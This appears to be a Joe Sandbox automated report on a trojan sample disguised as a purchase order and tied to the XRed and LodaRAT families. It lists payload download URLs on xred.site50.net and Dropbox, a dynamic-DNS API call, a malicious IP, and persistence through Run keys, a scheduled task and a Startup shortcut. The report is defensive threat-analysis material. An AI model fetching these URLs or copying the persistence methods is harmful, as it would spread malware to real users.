                                          NameMaliciousAntivirus DetectionReputation
                                          xred.mooo.comfalse
                                            		high
                                            http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                              		high

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://docs.google.com/:Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://docs.google.com/zSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drfalse
                                                        		high
                                                        https://docs.google.com/8Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://docs.googleSynaptics.exe, 00000002.00000002.4128174320.000000000D3DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4131914637.000000000E41E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4145646856.000000000FD5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4114641588.000000000A1BE000.00000004.00000010.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://docs.google.com/vSynaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.google.com/2Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/rSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl(New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://docs.google.com/8RSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://xred.site50.net/syn/Synaptics.rarNew PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drtrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://ip-score.com/checkip/._cache_New PO - Supplier 0202AW-PER2.exe, 00000001.00000002.4543305344.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.google.comuc?id=0BxsMXGfPIZfSVlVsSynaptics.exe, 00000002.00000002.4112858633.00000000098FE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://docs.google.com/8JSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://docs.google.com/dSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://docs.google.com/bSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://docs.google.com/Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://xred.site50.net/syn/SSLLibrary.dlNew PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.google.com/8bSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://docs.google.com/ZSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drfalse
                                                                                          		high
                                                                                          https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drfalse
                                                                                            		high
                                                                                            http://xred.site50.net/syn/Synaptics.rar8New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            https://docs.google.com/dRSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978HNew PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://docs.google.com/8ZSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://xred.site50.net/syn/SUpdate.iniNew PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drtrue
                                                                                                    • Avira URL Cloud: malware
                                                                                                    		unknown
                                                                                                    https://docs.google.com/RSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://docs.google.com/dJSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://docs.google.com/8jSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://xred.site50.net/syn/SSLLibrary.dllNew PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drtrue
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://docs.google.com/BSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://docs.google.com/rjSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://docs.google.com/derjSynaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high

                                                                                                                  World Map of Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public IPs

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  142.250.181.14
                                                                                                                  		docs.google.comUnited States
                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                  172.111.138.100
                                                                                                                  		unknownUnited States
                                                                                                                  		3223VOXILITYGBtrue
                                                                                                                  142.250.181.97
                                                                                                                  		drive.usercontent.google.comUnited States
                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                  69.42.215.252
                                                                                                                  		freedns.afraid.orgUnited States
                                                                                                                  		17048AWKNET-LLCUSfalse

                                                                                                                  General Information

                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1580482
                                                                                                                  Start date and time:2024-12-24 18:19:07 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 13m 43s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:43
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:New PO - Supplier 0202AW-PER2.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.expl.evad.winEXE@26/51@22/4
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  • Number of executed functions: 90
                                                                                                                  • Number of non-executed functions: 273
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                  Warnings

                                                                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 20.42.65.91, 52.182.143.212, 20.189.173.20, 20.189.173.22, 20.231.128.65, 184.28.90.27, 20.12.23.50, 13.107.246.63
                                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdeus17.eastus.cloudapp.azure.com, otelrules.afd.azureedge.net, onedsblobprdwus17.westus.cloudapp.azure.com, weu-azsc-config.officeapps.live.com, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                  • Execution Graph export aborted for target Synaptics.exe, PID 4076 because there are no executed function
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                  • VT rate limit hit for: New PO - Supplier 0202AW-PER2.exe

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  12:20:07API Interceptor996x Sleep call for process: Synaptics.exe modified
                                                                                                                  12:22:04API Interceptor1882633x Sleep call for process: splwow64.exe modified
                                                                                                                  12:22:24API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                                                  17:20:04Task SchedulerRun new task: QHCPYO.exe path: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                  17:20:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run QHCPYO "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                  17:20:13AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                  17:20:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run QHCPYO "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                  17:20:29AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QHCPYO.lnk

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  172.111.138.100RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                      Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                        bf-p2b.exeGet hashmaliciousLodaRATBrowse
                                                                                                                          gry.exeGet hashmaliciousUnknownBrowse
                                                                                                                            dlawt.exeGet hashmaliciousLodaRatBrowse
                                                                                                                              nXi3rwhMmB.exeGet hashmaliciousLodaRatBrowse
                                                                                                                                69.42.215.252RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                P4.exeGet hashmaliciousXRedBrowse
                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                s-part-0035.t-0009.t-msedge.netaYf5ibGObB.exeGet hashmaliciousRedLineBrowse
                                                                                                                                • 13.107.246.63
                                                                                                                                https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 13.107.246.63
                                                                                                                                Audio02837498.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 13.107.246.63
                                                                                                                                gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                • 13.107.246.63
                                                                                                                                Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 13.107.246.63
                                                                                                                                http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                • 13.107.246.63
                                                                                                                                https://www.bing.com/search?pglt=41&q=%E5%B9%B3%E6%88%9031%E5%B9%B4+%E8%A5%BF%E6%9A%A6&cvid=467cba4c80be484e858dd735013f0921&gs_lcrp=EgRlZGdlKgYIARAAGEAyBggAEEUYOTIGCAEQABhAMgYIAhAAGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQABhAMgYICBAAGEAyCAgJEOkHGPxV0gEINjUyMGowajGoAgCwAgE&FORM=ANNAB1&PC=U531Get hashmaliciousUnknownBrowse
                                                                                                                                • 13.107.246.63
                                                                                                                                pwn.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                • 13.107.246.63
                                                                                                                                7kf4hLzMoS.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                • 13.107.246.63
                                                                                                                                2S5jaCcFo5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 13.107.246.63
                                                                                                                                freedns.afraid.orgRNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                P4.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                                                                                • 69.42.215.252

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                VOXILITYGBRNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • 172.111.138.100
                                                                                                                                1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 104.243.246.120
                                                                                                                                nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 46.243.206.70
                                                                                                                                7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 37.221.166.158
                                                                                                                                fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 5.254.60.108
                                                                                                                                powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                • 37.221.160.225
                                                                                                                                Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • 172.111.138.100
                                                                                                                                1730537046a28265099d74997f6aaf573f6441587128b68a620c5fd7396901e33fe86509f2931.dat-decoded.exeGet hashmaliciousNjratBrowse
                                                                                                                                • 104.243.246.120
                                                                                                                                Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                • 172.111.138.100
                                                                                                                                zR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 45.74.58.7
                                                                                                                                AWKNET-LLCUSRNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                P4.exeGet hashmaliciousXRedBrowse
                                                                                                                                • 69.42.215.252
                                                                                                                                Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                                                                                • 69.42.215.252

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                37f463bf4616ecd445d4a1937da06e19RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                • 142.250.181.14
                                                                                                                                • 142.250.181.97
                                                                                                                                installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.181.14
                                                                                                                                • 142.250.181.97
                                                                                                                                #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.181.14
                                                                                                                                • 142.250.181.97
                                                                                                                                T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                                                                                                • 142.250.181.14
                                                                                                                                • 142.250.181.97
                                                                                                                                Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.181.14
                                                                                                                                • 142.250.181.97
                                                                                                                                Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 142.250.181.14
                                                                                                                                • 142.250.181.97
                                                                                                                                installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.181.14
                                                                                                                                • 142.250.181.97
                                                                                                                                Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 142.250.181.14
                                                                                                                                • 142.250.181.97
                                                                                                                                Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.181.14
                                                                                                                                • 142.250.181.97
                                                                                                                                3gPZmVbozD.msiGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.181.14
                                                                                                                                • 142.250.181.97

                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):118
                                                                                                                                Entropy (8bit):3.5700810731231707
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                MD5:573220372DA4ED487441611079B623CD
                                                                                                                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_43f0d137c6219254dfc5cf5a3d23f6d1d32ca47_455b7b6e_e683d587-3b96-46eb-9ac6-8504e75b9ef3\Report.wer

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):0.06951502427271773
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:QzQ8WMlQOH2lI6WMlmkvfdn0lA1C1TDWJU1CrnwZogQ9iZ1yB5d:QzQ8WkQ97WkzvFcAA1+JUArn6PRO5d
                                                                                                                                MD5:D51301E98D5742E2E7F6BEE4D54416BB
                                                                                                                                SHA1:55359CA34FD7029E998411E70C553FA0BAE1AC34
                                                                                                                                SHA-256:BE3E0CC9ED95ADBEBFF7E31EB96AD0D7E3526964F5F4DBA716899FB8F59CDE74
                                                                                                                                SHA-512:3A72CF170199FDCB4093056358DFD8C6BFFF7E23A0F02B78EB59946BEBB0B3E2F8902BD1732DBBB8D61C5F8CBD5BF1071222700EFE23E287110272CC31E70DC4
                                                                                                                                Malicious:false
